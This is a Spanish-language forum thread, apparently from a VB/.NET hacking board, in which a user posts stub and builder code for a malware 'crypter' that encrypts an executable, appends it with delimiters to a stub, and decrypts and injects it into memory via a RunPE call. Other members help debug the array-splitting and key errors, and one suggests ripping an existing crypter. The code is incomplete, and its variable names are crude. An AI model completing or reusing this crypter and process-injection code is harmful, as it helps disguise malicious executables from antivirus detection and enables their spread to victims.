hola me pueden como puedo usar esta runpe?

viewtopic.php?f=96&t=39020

STUB.
Sub Main()
Dim hola As String
Dim vagina As String
Dim pene As New pene
vagina = App.Path & "\" & App.EXEName & ".exe"

Open vagina For Binary As 1
hola = Space(LOF(1))
Get 1, , sString
Close 1
'sEncryptaccion = clsRC4.EncryptString(sString(1), sString(2))
hola = Split(sString, "[[_HOLA_]]")(1)
Call sInject(vagina, StrConv(pene.DecryptString(sString, "[[_HOLA_]]"), vbFromUnicode))
End Sub

CLIENTE:

Dim TEAMO As String
Open App.Path & "\" & "Stub.exe" For Binary As #1
TEAMO = Space(LOF(1))
Get #1, , TEAMO
Close #1

Dim TEQUIERO As String
Open txtruta.Text For Binary As #1
TEQUIERO = Space(LOF(1))
Get #1, , TEQUIERO
Close #1

With BITCH
.DialogTitle = "Guardar...."
.Filter = "(EXE) |*.exe"
.FileName = "sexo.exe"
.ShowSave
End With

If BITCH.FileName <> vbNullString Then
TEQUIERO = pene.EncryptString(TEQUIERO, txtclave.Text)
Open BITCH.FileName For Binary As #1
Put #1, , TEAMO & "[[_HOLA_]]" & TEQUIERO & "[[_HOLA_]]" & txtclave.Text & "[[_HOLA_]]"
Close #1

Cuando Encripto me sale un error, pero cuando compilo el Stub parece estar bien por que me sale este mensaje...
Imagen

Cuando ENcripto algo me sale un error, haber si me dan una mano..
No me queda muy claro en que momento te da el error, pero ese codigo no esta completo yo creeo
por ejem. de donde sacas la ruta del server original ? txtruta,text ??? lo escribes a mano ? porque el commondialog es para guardar no para abrir, en tu caso
En cuanto al RumPe creo que el llamado esta bien
sHost ruta del exe , sBytes cantidad de Bytes como aclara el maestro M3 en el encabezado de su codigo
Imagen
Si no sabe llamar un RunPe, no se que anda haciendo programando :S un cripter, pero si lo que quieres es rippear pues te recomiendo el de skyweb :s
El error te está diciendo dónde estás mal, y como sólo estas usando un array ese debe ser el problema, cuando te sale ese error te está diciendo que estas intentando acceder a un valor que no existe te lo explico con un ejemplo si yo tengo una cadena

cadena="hola#adios#:)"

y hago un split

hola=Split(cadena,"#")

entonces hola es un array que contiene 3 valores
hola[0]=hola
hola[1]=adios
hola[2]=:)

(aunque en vb no se accede a los arrays de esta manera)

entonces si tu quieres llamar a un cuarto valor te va a dar ese error porque no existe está fuera del intervalo si yo llamo a hola[3] el valor no existe solo tengo de 0 a 2 y ahí es cuando da ese error, por ende tu problema es muy probable que esté cuando llames a algun valor dentro del array hola

Disculpa mi explicación tan poco ortodoxa xD
//mHmm..
Muy de acuerdo con las palabras de adwind..

En primer lugar "hola" lo tienes declarado como string a secas, no como array de strings (necesario para hacer el split de VB), tienes que declararlo "dim hola () as string".

Por otro lado usas la misma variable para almacenar el fichero desencriptado y posteriormente lo reutilizas para hacer el split

Si vas a reutilizar variables al menos asegúrate de que sean del mismo tipo.

Más cosas..

Al llamar a la encriptación, pones de clave el DELIMITADOR, mal, si miras el builder verás cómo claramente le pones el valor de txtclave.text, es el que debes usar.

Así no aprenderás amigo, debes ir poco a poco...

PD: Buena explicación de linkgl, tenla en cuenta.
UDTools.net
GitHub: https://github.com/MetalUDT
Responder

Volver a “VB/.NET”